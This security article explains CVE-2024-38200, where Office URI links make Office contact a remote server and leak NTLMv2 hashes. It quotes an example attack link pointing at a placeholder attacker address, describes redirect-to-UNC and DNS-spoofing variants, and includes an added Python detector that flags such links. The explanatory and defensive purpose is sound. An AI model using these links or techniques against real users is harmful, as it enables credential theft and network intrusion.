CVE-2024-38200: How can Office disclose your credentials?

Man

Ordinary users risk becoming unwitting accomplices in attacks on their own networks.

A recent vulnerability in Microsoft Office, which has been assigned the identifier CVE-2024-38200 and a CVSS base score of 9.1, opens up the possibility of intercepting NTLMv2 hashes and potentially using them to attack corporate networks. We already briefly talked about it in August, but now that all its technical details have been revealed, it's time to discuss the problem in more depth.

The NTLMv2 hash is the authentication data that the system sends to confirm the user's identity. If attackers capture this hash and use it correctly, they can gain access to protected resources and even escalate their privileges on the network.

The main issue with CVE-2024-38200 is related to Office URIs, special links that open files directly in Word, Excel, and other applications. It turns out that this scheme can be used to make Office send a request to a remote server and so intercept the victim's NTLMv2 hash. To do this, the attacker sends the user a specially crafted link in the format "ms-word:ofe|u|http://<attack address>/leak.docx". When the user tries to open such a file, Office requests the remote resource, and the hash leaks.

Especially vulnerable are Microsoft 365 Office and Office 2019, which fetch the remote file without any warning. This makes it much easier for attackers to intercept hashes. In older versions, such as Office 2016, a security warning appears, making the attack harder to carry out.

An important detail is that attackers can redirect the request to a UNC resource (the universal file path format for network shares) using a 302 redirect. This technique bypasses the protection and yields an NTLMv2 hash via SMB or HTTP. The HTTP variant is easier to execute and more useful for follow-on attacks against domain controllers.
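A defender-side check for the link format quoted above, added here as an example and not taken from the original post: it parses Office URI scheme links (the post shows ms-word; the sibling ms-excel and ms-powerpoint schemes use the same command|flag|target layout, which extends beyond the post), extracts the document target, and flags UNC paths, IP literals, and any host outside a constructed internal allowlist, since any external HTTP target can answer with the 302 redirect described above. All hostnames and addresses are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# Office URI scheme links look like <scheme>:<command>|<flag>|<target>,
# e.g. "ms-word:ofe|u|http://host/leak.docx" as quoted in the post.
OFFICE_URI_RE = re.compile(
    r"(?P<scheme>ms-(?:word|excel|powerpoint)):(?P<cmd>[a-z]+)\|(?P<flag>[a-z])\|"
    r"(?P<target>[^\s\"'<>]+)",
    re.IGNORECASE,
)

# Constructed allowlist of internal document hosts (assumption for this example).
TRUSTED_HOSTS = {"sharepoint.corp.example", "files.corp.example"}

def find_office_uris(text):
    """Return every Office URI scheme link found in a message body."""
    return [m.group(0) for m in OFFICE_URI_RE.finditer(text)]

def classify_office_uri(uri):
    """Classify one link: 'allow', 'not-office-uri', or a 'block: ...' reason."""
    m = OFFICE_URI_RE.fullmatch(uri.strip())
    if m is None:
        return "not-office-uri"
    target = m.group("target")
    # A UNC or file: target makes Office talk SMB to that host directly.
    if target.startswith("\\\\") or target.lower().startswith("file:"):
        return "block: UNC/file target"
    parsed = urlparse(target)
    if parsed.scheme.lower() not in ("http", "https"):
        return "block: unexpected target scheme " + parsed.scheme
    host = (parsed.hostname or "").lower()
    if host in TRUSTED_HOSTS:
        return "allow"
    # An external host is not safe just because it speaks HTTP: it can
    # redirect to a UNC path. IP literals get their own reason for triage.
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}", host):
        return "block: external IP literal " + host
    return "block: external host " + host

def scan_message(text):
    """Map each Office URI found in a message to its verdict."""
    return {uri: classify_office_uri(uri) for uri in find_office_uris(text)}

if __name__ == "__main__":
    # Constructed sample message; 203.0.113.5 is a documentation address.
    sample = ("Please review ms-word:ofe|u|http://203.0.113.5/leak.docx and "
              "ms-word:ofv|u|https://sharepoint.corp.example/q3/report.docx")
    for link, verdict in scan_message(sample).items():
        print(verdict, "<-", link)
```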

The success of an attack largely depends on the security settings (GPOs) on the victim's computer. For example, if automatic authentication is enabled in LAN zones or trusted sites, Office will automatically sign in when the link is opened, sending an NTLMv2 hash to the attacker's server. In this way, even an ordinary domain user can unwittingly provide their authentication data.

If the security settings are stricter, attackers can create a fake DNS record and redirect the request to their server. This makes the system treat the attacker's server as a local (intranet) resource, after which the hash once again ends up in the attackers' hands.

To protect against this vulnerability, we recommend updating your Office applications to the latest versions, changing your local network settings to disable automatic authentication, and enabling additional security measures for LDAP connections.
